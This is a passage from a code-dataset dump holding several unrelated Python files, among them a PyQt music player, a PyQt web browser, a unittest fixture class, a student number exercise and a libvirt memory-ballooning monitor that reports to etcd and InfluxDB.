]\n\n db.session.bulk_save_objects(hits)\n db.session.commit()\n\n# Uses a raw SQL query to TRUNCATE the hits table.\n# SQLAlchemy doesn't have a built in function to do this\n# TRUNCATE Removes all the data from the table, and resets\n# the auto incrementing primary key\ndef undo_hits():\n db.session.execute('TRUNCATE hits;')\n db.session.commit()\n","repo_name":"scottgit/evidential","sub_path":"app/seeds/hits.py","file_name":"hits.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31473308633","text":"import sys\nimport requests\nimport os\nimport yandex_api as ya\n\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5.QtCore import QCoreApplication, QUrl\nfrom PyQt5.QtWidgets import QApplication, QSlider, QMessageBox, QMenu, QMainWindow, \\\n QDialog, QAction, QListWidgetItem\nfrom main_window import Ui_MainWindow\nfrom PyQt5.QtMultimedia import QMediaPlayer, QMediaContent, QMediaPlaylist\nfrom enter_yandex_music import Yam_Dialog\n\n\nLOGIN = os.getenv('username')\nPASSWORD = os.getenv('password')\n\nclient = ya.YandexClient((LOGIN, PASSWORD))\n# list_track = client.get_ru_chart().tracks\nlist_track = list()\n\n\ndef get_url_by_track(track_id, client_ya):\n track = client_ya.track_by_id(track_id)\n return track.download_link()\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.player = QMediaPlayer()\n self.current_playlist = QMediaPlaylist(self.player)\n self.userAction = -1 # 0- stopped, 1- playing 2-paused\n self.player.stateChanged.connect(self.state_changed)\n self.player.positionChanged.connect(self.position_changed)\n self.player.volumeChanged.connect(self.volume_changed)\n self.player.setVolume(60)\n self.player.durationChanged.connect(self.set_duration)\n self.setWindowTitle('Music Player')\n self.statusBar().showMessage('No Media, Volume: %d' % self.player.volume())\n self.slider.setMinimum(0)\n self.slider.setMaximum(100)\n self.slider.setTracking(False)\n self.slider.sliderMoved.connect(self.seek_position)\n self.play_button.clicked.connect(self.play_handler)\n self.pause_button.clicked.connect(self.pause_handler)\n self.stop_button.clicked.connect(self.stop_handler)\n self.volume_decrease_button.clicked.connect(self.decrease_volume)\n self.volume_increase_button.clicked.connect(self.increase_volume)\n self.downloaded_tracks.itemDoubleClicked.connect(self.open_file)\n self.enter_yandex_button.clicked.connect(self.enter_yandex)\n self.prev_button.clicked.connect(self.prevItemPlaylist)\n self.next_button.clicked.connect(self.nextItemPlaylist)\n self.track_path = 'tracks/'\n self.fill_downloaded_tracks()\n self.search_button.clicked.connect(self.search)\n\n for track in list_track:\n item = QListWidgetItem(str(track) + ' — ' + track.duration)\n item.setData(256, track.id)\n self.playlist_window.addItem(item)\n\n self.playlist_window.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.playlist_window.customContextMenuRequested.connect(self.context_menu)\n self.playlist_window.itemDoubleClicked.connect(self.add_online_song)\n\n self.search_results.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.search_results.customContextMenuRequested.connect(self.context_menu_search)\n self.search_results.itemDoubleClicked.connect(self.add_online_song)\n\n def enter_yandex(self):\n a = EnterYandex()\n a.show()\n a.exec()\n\n def context_menu(self):\n menu = QMenu()\n download_action = QAction('Скачать')\n download_action.triggered.connect(self.download)\n menu.addAction(download_action)\n menu.exec(QtGui.QCursor.pos())\n\n def context_menu_search(self):\n menu = QMenu()\n download_action = QAction('Скачать')\n download_action.triggered.connect(self.download_search)\n menu.addAction(download_action)\n menu.exec(QtGui.QCursor.pos())\n\n def search(self):\n global client\n search_text = self.lineEdit.text()\n search_result = client.search_all(search_text, True)\n track_list = search_result[1]\n for artist in search_result[0]:\n artists_track_list = artist.get_tracks()\n track_list += artists_track_list\n self.search_results.clear()\n\n for track in track_list:\n item = QListWidgetItem(str(track) + ' — ' + track.duration)\n item.setData(256, track.id)\n self.search_results.addItem(item)\n\n def download_search(self):\n global client\n if client.is_anonymous:\n error = QMessageBox()\n error.setWindowTitle('Ошибка')\n error.setText('Вы не авторизированы')\n error.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n error.exec_()\n else:\n cur_row = self.search_results.currentRow()\n cur_track = self.search_results.item(cur_row)\n self.current_track_id = cur_track.data(256)\n track = client.track_by_id(self.current_track_id)\n track.download(f'{self.track_path}{str(track)}.mp3')\n self.fill_downloaded_tracks()\n\n def add_online_song(self, item):\n track_id = item.data(256)\n url = get_url_by_track(track_id, client)\n url = QUrl(url)\n content = QMediaContent(url)\n self.current_playlist.loaded.connect(self.play_handler)\n self.current_playlist.addMedia(content)\n\n def set_duration(self):\n duration = self.player.duration()\n seconds = duration // 1000\n minutes = seconds // 60\n seconds -= minutes * 60\n s_seconds = str(seconds) if seconds >= 10 else '0' + str(seconds)\n s_minutes = str(minutes) if minutes >= 10 else '0' + str(minutes)\n self.slider_label_2.setText(f'{s_minutes}:{s_seconds}')\n\n def open_file(self, item):\n track_name = item.text()\n full_file_path = os.path.join(os.getcwd(), f'tracks/{track_name}')\n url = QUrl.fromLocalFile(full_file_path)\n content = QMediaContent(url)\n self.current_playlist.loaded.connect(self.play_handler)\n self.current_playlist.addMedia(content)\n\n def play_handler(self):\n self.userAction = 1\n self.statusBar().showMessage('Playing at Volume %d' % self.player.volume())\n if self.player.state() == QMediaPlayer.StoppedState:\n if self.player.mediaStatus() == QMediaPlayer.NoMedia:\n if self.current_playlist.mediaCount() == 0:\n error = QMessageBox()\n error.setWindowTitle('Ошибка')\n error.setText('Трек не выбран')\n error.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n error.exec_()\n if self.current_playlist.mediaCount() != 0:\n self.player.setPlaylist(self.current_playlist)\n self.player.play()\n elif self.player.mediaStatus() == QMediaPlayer.LoadedMedia:\n self.player.play()\n elif self.player.mediaStatus() == QMediaPlayer.BufferedMedia:\n self.player.play()\n elif self.player.state() == QMediaPlayer.PlayingState:\n pass\n elif self.player.state() == QMediaPlayer.PausedState:\n self.player.play()\n\n def init_player(self):\n url = get_url_by_track(self.current_track_id, client)\n content = QMediaContent(QtCore.QUrl(url))\n self.player.setMedia(content)\n self.player.setVolume(50)\n self.player.play()\n\n def current_track(self, item: QListWidgetItem):\n self.current_track_id = item.data(256)\n\n def pause_handler(self):\n self.userAction = 2\n self.statusBar().showMessage('Paused at Volume %d' % (self.player.volume()))\n self.player.pause()\n\n def stop_handler(self):\n self.userAction = 0\n self.statusBar().showMessage('Stopped at Volume %d' % (self.player.volume()))\n if self.player.state() == QMediaPlayer.PlayingState:\n self.stop_state = True\n self.player.stop()\n elif self.player.state() == QMediaPlayer.PausedState:\n self.player.stop()\n elif self.player.state() == QMediaPlayer.StoppedState:\n pass\n\n def state_changed(self):\n if self.player.state() == QMediaPlayer.PausedState:\n self.player.pause()\n elif self.player.state() == QMediaPlayer.StoppedState:\n self.player.stop()\n elif self.player.state() == QMediaPlayer.PlayingState:\n self.player.play()\n\n def position_changed(self, position, sender_type=False):\n self.slider.setMaximum(self.player.duration())\n if not sender_type:\n self.slider.setValue(position)\n seconds = position // 1000\n minutes = seconds // 60\n seconds -= minutes * 60\n s_seconds = str(seconds) if seconds >= 10 else '0' + str(seconds)\n s_minutes = str(minutes) if minutes >= 10 else '0' + str(minutes)\n self.slider_label_1.setText(f'{s_minutes}:{s_seconds}')\n\n def seek_position(self, position):\n sender = self.sender()\n if isinstance(sender, QSlider):\n if self.player.isSeekable():\n self.player.setPosition(position)\n\n def volume_changed(self):\n msg = self.statusBar().currentMessage()\n msg = msg[:-2] + str(self.player.volume())\n self.statusBar().showMessage(msg)\n\n def increase_volume(self):\n vol = self.player.volume()\n vol = min(vol + 5, 100)\n self.player.setVolume(vol)\n\n def decrease_volume(self):\n vol = self.player.volume()\n vol = max(vol - 5, 0)\n self.player.setVolume(vol)\n\n def download(self):\n global client\n if client.is_anonymous:\n error = QMessageBox()\n error.setWindowTitle('Ошибка')\n error.setText('Вы не авторизированы')\n error.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n error.exec_()\n else:\n cur_row = self.playlist_window.currentRow()\n cur_track = self.playlist_window.item(cur_row)\n self.current_track_id = cur_track.data(256)\n track = client.track_by_id(self.current_track_id)\n track.download(f'{self.track_path}{str(track)}.mp3')\n self.fill_downloaded_tracks()\n\n def fill_downloaded_tracks(self):\n self.downloaded_tracks.clear()\n list_downloaded_tracks = os.listdir(self.track_path)\n for track in list_downloaded_tracks:\n item = QListWidgetItem(str(track))\n self.downloaded_tracks.addItem(item)\n\n def prevItemPlaylist(self):\n self.player.playlist().previous()\n\n def nextItemPlaylist(self):\n self.player.playlist().next()\n\n def exit_action(self):\n exit_ac = QAction('&Exit', self)\n exit_ac.setStatusTip('Exit App')\n exit_ac.triggered.connect(self.closeEvent)\n return exit_ac\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Message', 'Вы уверены, что хотите выйти?', QMessageBox.Yes | QMessageBox.No,\n QMessageBox.Yes)\n\n if reply == QMessageBox.Yes:\n QCoreApplication.quit()\n else:\n try:\n event.ignore()\n except AttributeError:\n pass\n\n\nclass EnterYandex(QDialog, Yam_Dialog):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pushButton.clicked.connect(self.enter)\n\n def enter(self):\n global client\n login = self.login_yan.text()\n password = self.pass_yan.text()\n client = ya.YandexClient((login, password))\n if client.is_anonymous:\n error = QMessageBox()\n error.setWindowTitle('Ошибка')\n error.setText('Неверно введен логин или пароль')\n error.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n error.exec_()\n else:\n self.close()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MainWindow()\n ex.show()\n sys.exit(app.exec_())\n","repo_name":"tsukikomiata/player_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29419173639","text":"number_one = int(input('Enter the first number:'))\nnumber_two = int(input('Enter the second number:'))\ndiv, sum1, sum2 = 1,0,0\nwhile div <= number_one / 2:\n if number_one % div == 0:\n sum1 += div\n div += 1\ndiv = 1 # let's return the divisor to 1\nwhile div <= number_two / 2:\n if number_two% div == 0:\n sum2 += div\n div += 1\nif sum1 == number_two and sum2 == number_one:\n print ('The numbers are friendly!')\nelse:\n print ('The numbers are not friendly!')","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej2/tema2_ej2_51eded65d06968f25bd4934da46ad8bb.py","file_name":"tema2_ej2_51eded65d06968f25bd4934da46ad8bb.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74061813369","text":"import os\nimport unittest\n\nfrom app import app, db\nfrom app.models import User, Idea, Vote\nfrom app.models.event import Event, EventType\nfrom app.models.user import UserRole\n\n\nclass BaseTestCase(unittest.TestCase):\n testAdmin = None\n testUser = None\n testIdea = None\n testVote = None\n testEvent = None\n\n def setUp(self):\n self.db = db\n basedir = os.path.abspath(os.path.dirname(__file__))\n app.config['SQLALCHEMY_DATABASE_URI'] = \\\n 'sqlite:///' + os.path.join(basedir, 'test.db')\n self.app = app.test_client()\n self.db.create_all()\n self.setTestAdmin()\n self.setTestUser()\n self.setTestIdea()\n self.setTestVote()\n self.setTestEvent()\n\n def tearDown(self):\n self.db.session.remove()\n self.db.drop_all()\n\n def addModel(self, user):\n self.db.session.add(user)\n self.db.session.commit()\n\n def addTestModels(self):\n self.addModel(self.testAdmin)\n self.addModel(self.testUser)\n self.testIdea.user_id = self.testUser.id\n self.addModel(self.testIdea)\n self.testVote.idea_id = self.testIdea.id\n self.testVote.user_id = self.testUser.id\n self.addModel(self.testVote)\n self.testEvent.user_id = self.testUser.id\n self.addModel(self.testEvent)\n\n def setTestAdmin(self):\n self.testAdmin = User()\n self.testAdmin.username = 'admin'\n self.testAdmin.email = 'admin@ideahub.com'\n self.testAdmin.role = UserRole.admin\n self.testAdmin.set_password('123456')\n self.testAdmin.generate_auth_token()\n\n def setTestUser(self):\n self.testUser = User()\n self.testUser.username = 'john'\n self.testUser.name = 'John'\n self.testUser.surname = 'Doe'\n self.testUser.email = 'john@mail.com'\n self.testUser.tags = 'web development, csse'\n self.testUser.set_password('123456')\n self.testUser.generate_auth_token()\n\n def setTestIdea(self):\n self.testIdea = Idea()\n self.testIdea.title = 'My Awesome Test Idea'\n self.testIdea.description = 'Description of an Awesome Test Idea'\n self.testIdea.category = 'Engineering'\n self.testIdea.tags = self.testUser.tags\n\n def setTestVote(self):\n self.testVote = Vote()\n self.testVote.value = 1\n\n def setTestEvent(self):\n self.testEvent = Event()\n self.testEvent.type = EventType.votes\n self.testEvent.idea_name = self.testIdea.title\n self.testEvent.data = 10\n","repo_name":"boceckts/ideahub","sub_path":"test/base_test_case.py","file_name":"base_test_case.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26720396051","text":"import sys\nimport PyQt5\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtWebEngineWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtPrintSupport import *\n\nimport os\nimport sys\n\n# Please Install This Packages pip install PyQtWebEngine\n# pip install PyQt5\n# Uttkarsh_Pandey\n# Yash_OP\n# Integrity\n# AlwaysBees\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.browser = QWebEngineView()\n self.browser.setUrl(QUrl('https://www.bing.com/?toWww=1&redig=375257EAD25C4BF5AA82551D2405763A'))\n self.setCentralWidget(self.browser)\n self.showMaximized()\n file_menu = self.menuBar().addMenu(\"&File\")\n\n save_file_action = QAction(QIcon(os.path.join('images', 'disk--pencil.png')), \"Save Page As...\", self)\n save_file_action.setStatusTip(\"Save current page to file\")\n save_file_action.triggered.connect(self.save_file)\n file_menu.addAction(save_file_action)\n\n # navbar\n navbar = QToolBar()\n self.addToolBar(navbar)\n\n navbar2 = QToolBar()\n self.addToolBar(navbar2)\n\n back_btn = QAction('Back', self)\n back_btn.triggered.connect(self.browser.back)\n navbar.addAction(back_btn)\n\n forward_btn = QAction('Forward', self)\n forward_btn.triggered.connect(self.browser.forward)\n navbar.addAction(forward_btn)\n\n reload_btn = QAction('Reload', self)\n reload_btn.triggered.connect(self.browser.reload)\n navbar.addAction(reload_btn)\n\n home_btn = QAction('Home', self)\n home_btn.triggered.connect(self.navigate_home)\n navbar.addAction(home_btn)\n\n self.url_bar = QLineEdit()\n self.url_bar.returnPressed.connect(self.navigate_to_url)\n navbar.addWidget(self.url_bar)\n\n self.browser.urlChanged.connect(self.update_url)\n# ========================================================================================================================\n # navbar2\n tab1 = QAction('Main', self)\n tab1.triggered.connect(self.main_tab1)\n navbar2.addAction(tab1)\n tab2 = QAction('Incognito', self)\n tab2.triggered.connect(self.main_tab2)\n navbar2.addAction(tab2)\n main3 = QAction('Google', self)\n main3.triggered.connect(self.main_tab3)\n navbar2.addAction(main3)\n main4 = QAction('Yandex', self)\n main4.triggered.connect(self.main_tab4)\n navbar2.addAction(main4)\n main5 = QAction('Yahoo', self)\n main5.triggered.connect(self.main_tab5)\n navbar2.addAction(main5)\n new_btn = QAction('Brave', self)\n new_btn.triggered.connect(self.navigate_tab)\n navbar2.addAction(new_btn)\n# =========================================================================================================================\n new_btn1 = QAction('TicTacToe', self)\n new_btn1.triggered.connect(self.navigate_tab1)\n navbar2.addAction(new_btn1)\n aboutproject1 = QAction('AboutOurProject', self)\n aboutproject1.triggered.connect(self.aboutproject)\n navbar2.addAction(aboutproject1)\n ninjagame = QAction('Knife Master', self)\n ninjagame.triggered.connect(self.ninjagamebtn)\n navbar2.addAction(ninjagame)\n bullseye = QAction('Bow Master', self)\n bullseye.triggered.connect(self.bullseyef)\n navbar2.addAction(bullseye)\n flipgame = QAction('Flip Game', self)\n flipgame.triggered.connect(self.flipgamef)\n navbar2.addAction(flipgame)\n rimage = QAction('RandomImage', self)\n rimage.triggered.connect(self.randomimagef)\n navbar2.addAction(rimage)\n# =========================================================================================================================\n#functions\n def navigate_home(self):\n self.browser.setUrl(QUrl('http://yash.brizy.site'))\n def navigate_tab(self):\n self.browser.setUrl(QUrl('https://seach.brave.com'))\n def navigate_tab1(self):\n self.browser.setUrl(QUrl('https://bit.ly/tictactoeop'))\n def main_tab1(self):\n self.browser.setUrl(QUrl('https://www.bing.com/?toWww=1&redig=94F4AABD4CB34B349328F5A428C42C5E'))\n def main_tab2(self):\n self.browser.setUrl(QUrl('https://duckduckgo.com'))\n def main_tab3(self):\n self.browser.setUrl(QUrl('https://google.com'))\n def main_tab4(self):\n self.browser.setUrl(QUrl('https://yandex.com/'))\n def main_tab5(self):\n self.browser.setUrl(QUrl('https://in.search.yahoo.com/?fr2=inr'))\n def aboutproject(self):\n self.browser.setUrl(QUrl('https://bit.ly/aboutinegrity'))\n def ninjagamebtn(self):\n self.browser.setUrl(QUrl('https://bit.ly/ninjagamebtn'))\n def bullseyef(self):\n self.browser.setUrl(QUrl('https://bit.ly/bullseyegameop'))\n def flipgamef(self):\n self.browser.setUrl(QUrl('https://bit.ly/flipgameop'))\n def randomimagef(self):\n self.browser.setUrl(QUrl('https://bit.ly/randomimagebyyash'))\n\n# ====================================================================================================================\n\n def update_url(self, q):\n self.url_bar.setText(q.toString())\n\n def navigate_to_url(self):\n url = self.url_bar.text()\n self.browser.setUrl(QUrl(url))\n def open_file(self):\n filename, _ = QFileDialog.getOpenFileName(self, \"Open file\", \"\",\n \"Hypertext Markup Language (*.htm *.html);;\"\n \"All files (*.*)\")\n\n if filename:\n with open(filename, 'r') as f:\n html = f.read()\n\n self.tabs.currentWidget().setHtml(html)\n self.urlbar.setText(filename)\n\n def save_file(self):\n filename, _ = QFileDialog.getSaveFileName(self, \"Save Page As\", \"\",\n \"Hypertext Markup Language (*.htm *html);;\"\n \"All files (*.*)\")\n\n if filename:\n html = self.tabs.currentWidget().page().toHtml()\n with open(filename, 'w') as f:\n f.write(html.encode('utf8'))\n# =================================================================================================================\napp = QApplication(sys.argv)\nQApplication.setApplicationName('Intergrity Browser')\nwindow = MainWindow()\napp.exec_()\n","repo_name":"Eternity-ad/Eternity-Browser","sub_path":"v0.70.3.py","file_name":"v0.70.3.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45597656725","text":"from heapq import heappop, heappush\n\ndef solution(N, road, K):\n distances=[float('inf')]*N\n \n graph=[[] for _ in range(N)]\n \n for s,e,c in road:\n graph[s-1].append([c,e-1])\n graph[e-1].append([c,s-1])\n \n q=[[0,0]]\n distances[0]=0\n while q:\n travel,now=heappop(q)\n \n if travel>distances[now]:\n continue\n \n for distance,next in graph[now]:\n if distance+travel expansion_thresh*guest.currentmem and guest.currentActualmem < guest.maxmem:\n needy[uuid] = min(0.1*guest.maxmem,guest.maxmem-guest.currentActualmem)\n guest.log(\"Is needy, need: %dMB\", needy[uuid])\n extraMemory += needy[uuid]\n # need guest do not have idle\n softIdle[uuid] = 0\n hardIdle[uuid] = 0\n guest.log('Soft Idle is %dMB', softIdle[uuid])\n guest.log('Hard Idle is %dMB', hardIdle[uuid])\n softIdleMemory += softIdle[uuid]\n hardIdleMemory += hardIdle[uuid]\n except:\n errorlogger.exception('Unable to monitor guest name: %s, uuid: %s ',guest.domName, uuid)\n\n debuglogger.debug(\"Total soft idle memory: %dMB\", softIdleMemory)\n debuglogger.debug(\"Total hard idle memory: %dMB\", hardIdleMemory)\n debuglogger.debug(\"Extra Memory Required: %dMB\", extraMemory)\n # Monitor the host\n try:\n # Idle Memory should be subtracted from guest used memory.\n # i.e. It should not count towards host load.\n # The result of this is that a host is only migrated when its\n # requirements cannot be satisfied after hard ballooning of all the other guests.\n host.monitor(softIdleMemory + hardIdleMemory, stealTime)\n # This will try to migrate away guests of there is a overload\n except Exception as e:\n errorlogger.exception('Unable to monitor host')\n\n # Pot represents the amount of memory freely availble for give away.\n pot = calculatePot(host, softIdleMemory + hardIdleMemory)\n # If 90% of the available memory is used, reclaim some memory\n # This is required to prevent swapping\n # TODO: use hard idle too here\n if pot < 0.1*(host.totalmem - host.hypervisorLoad):\n while pot < 0.2*(host.totalmem - host.hypervisorLoad) and len(softIdle.keys()) > 0:\n idleUuid = softIdle.keys()[0]\n softIdleGuest = guests[idleUuid]\n softIdleGuestMem = softIdle[idleUuid]\n softIdleGuest.balloon(softIdleGuest.currentActualmem - softIdleGuestMem)\n pot += softIdleGuestMem\n del softIdle[idleUuid]\n\n # If demands can be satisfied by soft reclamation\n if host.loadmem + hardIdleMemory + extraMemory <= host.totalmem:\n debuglogger.debug(\"Demands can be satisfied by soft reclamation\")\n #pot = calculatePot(host, softIdleMemory + hardIdleMemory)\n for uuid in needy.keys():\n needyGuest = guests[uuid]\n need = needy[uuid]\n while pot < need and len(softIdle.keys()) > 0:\n idleUuid = softIdle.keys()[0]\n softIdleGuest = guests[idleUuid]\n softIdleGuestMem = softIdle[idleUuid]\n softIdleGuest.balloon(softIdleGuest.currentActualmem - softIdleGuestMem)\n pot += softIdleGuestMem\n del softIdle[idleUuid]\n if(pot-need < -100):\n errorlogger.warn(\"More than 100MB deficit in pot. check the algo.\")\n else:\n needyGuest.balloon(needyGuest.currentActualmem + need )\n pot -= need\n\n # If hard reclamation required\n elif host.loadmem + extraMemory < host.totalmem:\n debuglogger.debug(\"Demands need hard reclamation\")\n # pot represents the memory free to give away without ballooning\n # more memory can be added to pot buy ballooning down any guest\n # ballooning up a guest takes away memory from the pot\n #pot = calculatePot(host, softIdleMemory + hardIdleMemory)\n needAfterSoft = extraMemory - softIdleMemory\n # take away proportional amount of memory from each idle guest\n for uuid in needy.keys():\n needyGuest = guests[uuid]\n need = needy[uuid]\n while pot < need and len(softIdle.keys()) > 0:\n idleUuid = softIdle.keys()[0]\n idleGuest = guests[idleUuid]\n softIdleGuestMem = softIdle[idleUuid]\n hardIdleGuestMem = hardIdle[idleUuid]\n hardReclaim = (hardIdleGuestMem*needAfterSoft)/hardIdleMemory\n if hardReclaim > 0:\n idleGuest.balloon(idleGuest.usedmem - hardReclaim)\n elif softIdleGuestMem > 0:\n idleGuest.balloon(idleGuest.currentActualmem - softIdleGuestMem)\n pot += softIdleGuestMem + hardReclaim\n del softIdle[idleUuid]\n del hardIdle[idleUuid]\n if(pot-need < -100):\n errorlogger.warn(\"More than 100MB deficit in pot. check the algo.\")\n else:\n needyGuest.balloon(neeedyGuest.currentActualmem + need)\n pot -= need\n # If not enough memory is left to give away\n else:\n debuglogger.debug(\"Overload, calculate entitlement\")\n # calcualte the entitlement of each guest\n idleMemory = 0\n idle = {}\n excessMemory = 0\n excessUsed = {}\n excessUsedMemory = 0\n for uuid in guests.keys():\n guest = guests[uuid]\n entitlement = (guest.maxmem*host.totalmem)/totalGuestMemory\n if entitlement < guest_reserved:\n guest.log(\"Entitlement less than reserved: %dMB\", entitlement)\n #TODO: next line is wrong. Fix it.\n #The intent is that if entitlement is less than reserved,\n # the extra amount should be given from other VM's entitlement.\n # Below implementation may work, but is wrong\n totalGuestMemory -= (guest_reserved - entitlement)\n entitlement = guest_reserved\n guest.log(\"Entitlement: %dMB\", entitlement)\n if (uuid in needy.keys()) and guest.currentActualmem < entitlement:\n needy[uuid] = entitlement - guest.currentActualmem\n extraMemory += entitlement - guest.currentActualmem\n elif uuid in needy.keys():\n del needy[uuid]\n idle[uuid] = calculateSoftIdle(guest) + calculateHardIdle(guest)\n idleMemory += idle[uuid]\n excessUsed[uuid] = max(guest.currentActualmem - idle[uuid] - entitlement, 0)\n excessUsedMemory = excessUsedMemory + excessUsed[uuid]\n else:\n idle[uuid] = 0\n if uuid in softIdle.keys():\n idle[uuid] = idle[uuid] + softIdle[uuid]\n if uuid in hardIdle.keys():\n idle[uuid] = idle[uuid] + hardIdle[uuid]\n idleMemory += idle[uuid]\n excessUsed[uuid] = max(guest.currentActualmem - idle[uuid] - entitlement, 0)\n excessUsedMemory = excessUsedMemory + excessUsed[uuid]\n #pot = calculatePot(host, idleMemory)\n needAfterIdle = extraMemory - idleMemory\n for needyUuid in needy.keys():\n needyGuest = guests[needyUuid]\n need = needy[needyUuid]\n while pot < need and len(idle.keys()) > 0:\n excessUuid = idle.keys()[0]\n excessGuest = guests[excessUuid]\n usedReclaim = excessUsed[excessUuid]\n idleReclaim = idle[excessUuid]\n usedReclaim = (excessUsed[excessUuid]*needAfterIdle)/excessUsedMemory\n excessGuest.balloon(excessGuest.loadmem - usedReclaim)\n pot += idleReclaim + usedReclaim\n del idle[excessUuid]\n del excessUsed[excessUuid]\n if(pot-need < -100):\n errorlogger.warn(\"More than 100MB deficit in pot. check the algo.\")\n else:\n needyGuest.balloon(needyGuest.currentActualmem + need)\n pot -= need\n\ndef sendLog():\n global hostLog\n global guestLog\n if config.getboolean('influx','enabled'):\n db = config.get('influx','db')\n ihost = config.get('influx','host')\n payload = \"\"\n for key in hostLog.keys():\n payload = payload + (key+',host='+hostname+' value='+str(hostLog[key])+'\\n')\n for guest in guestLog.keys():\n stat = guestLog[guest]\n for key in stat.keys():\n payload = payload + (key+',guest='+guest+',host='+hostname+' value='+str(stat[key])+'\\n')\n # this metric is used to track migration\n n = hostname[-1:]\n try:\n n = int(n)\n except:\n n = ord(n)\n payload = payload + ('host,guest='+guest+' value='+str(n)+'\\n')\n # add self monitoring metrics\n meminfo = selfProcess.get_memory_info()\n payload = payload + ('selfRss,host='+hostname+' value='+str(meminfo.rss/(1024*1024))+'\\n')\n payload = payload + ('selfVms,host='+hostname+' value='+str(meminfo.vms/(1024*1024))+'\\n')\n payload = payload + ('selfCpu,host='+hostname+' value='+str(selfProcess.get_cpu_percent(interval=None))+'\\n')\n resp = requests.post('http://'+ihost+'/write?db='+db, data=payload)\n if resp.status_code != 204:\n debuglogger.warn('Unable to send request to influx db %s', resp.content)\n hostLog.clear()\n guestLog.clear()\n\ndef reclaimForMigration():\n global hostname\n global guests\n global etcdClient\n global host\n toReclaim = float(etcdClient.read('/' + hostname + '/reclaim').value)\n if toReclaim <= 0:\n return\n totalSoftIdle = 0\n totalHardIdle = 0\n softIdle = {}\n hardIdle = {}\n for uuid in guests.keys():\n softIdle[uuid] = calculateSoftIdle(guest)\n hardIdle[uuid] = calculateHardIdle(guest)\n totalSoftIdle = totalSoftIdle + softIdle[uuid]\n totalHardIdle = totalHardIdle + hardIdle[uuid]\n pot = calculatePot(host, totalSoftIdle + totalHardIdle)\n toReclaim = toReclaim - pot\n while toReclaim > 0 and len(softIdle) > 0:\n idleUuid = softIdle.keys()[0]\n softIdleGuest = guests[idleUuid]\n softIdleGuestMem = softIdle[idleUuid]\n softIdleGuest.balloon(softIdleGuest.currentActualmem - softIdleGuestMem)\n toReclaim = toReclaim - softIdleGuestMem\n del softIdle[idleUuid]\n while toReclaim > 0 and len(hardIdle) > 0:\n idleUuid = hardIdle.keys()[0]\n hardIdleGuest = guests[idleUuid]\n hardIdleGuestMem = hardIdle[idleUuid]\n hardIdleGuest.balloon(hardIdleGuest.usedmem - hardIdleGuestMem)\n toReclaim = toReclaim - hardIdleGuestMem\n del hardIdle[idleUuid]\n etcdClient.write('/'+hostname+'/reclaim', toReclaim)\n\n\n\ndef main():\n global config\n global host\n global guests\n global cpuCores\n global etcdClient\n # Set up logger\n #logging.basicConfig(filename='monitor.log',format='%(asctime)s: %(levelname)8s: %(message)s', level=logging.DEBUG)\n debuglogger.info('Monitoring started!')\n\n # check if root\n if os.geteuid() != 0:\n errorlogger.error('Root permission required to run the script! Exiting.')\n sys.exit(1)\n\n # connect to the hypervisor\n try:\n conn = libvirt.open('qemu:///system')\n except Exception as e:\n errorlogger.exception('Failed to open connection to the hypervisor, Exiting')\n sys.exit(1)\n\n if conn == None:\n errorlogger.error('Failed to open connection to the hypervisor, Exiting')\n sys.exit(1)\n\n # get the list of all domains managed by the hypervisor\n try:\n doms = conn.listAllDomains()\n except Exception as e:\n errorlogger.exception('Failed to find the domains, Exiting')\n sys.exit(1)\n\n # start the event loop\n try:\n virEventLoopNativeStart()\n debuglogger.info(\"libvirt event loop started\")\n except Exception as e:\n errorlogger.exception('Failed to start libvirt event loop, Exiting')\n sys.exit(1)\n # register callbacks for domain startup events\n try:\n conn.domainEventRegisterAny(None, libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE, domainLifecycleCallback, None)\n debuglogger.info(\"libvirt domain lifecycle callbacks registered\")\n except Exception as e:\n errorlogger.exception('Failed to register domain lifecycle events, Exiting')\n\n cpuCores = conn.getCPUMap(0)[0]\n host = Host(conn)\n etcdClient.write('/'+hostname+'/reclaim', 0)\n for domain in doms:\n if domain.isActive():\n addNewDomain(domain)\n\n # Main montioring loop\n while True:\n try:\n debuglogger.info(\"****Starting new round of monitoring***\")\n monitor()\n except Exception as e:\n errorlogger.exception('An exception occured in monitoring')\n sendLog()\n t = 0\n while t < config.getint('monitor', 'time'):\n try:\n reclaimForMigration()\n except Exception as e:\n errorlogger.exception('An exception occured in reclaimForMigration')\n time.sleep(2)\n t +=2\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shivanshuag/thesis-code","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":17255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16918700477","text":"from django.db.models import Prefetch\nfrom django.db.models.query import QuerySet\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom 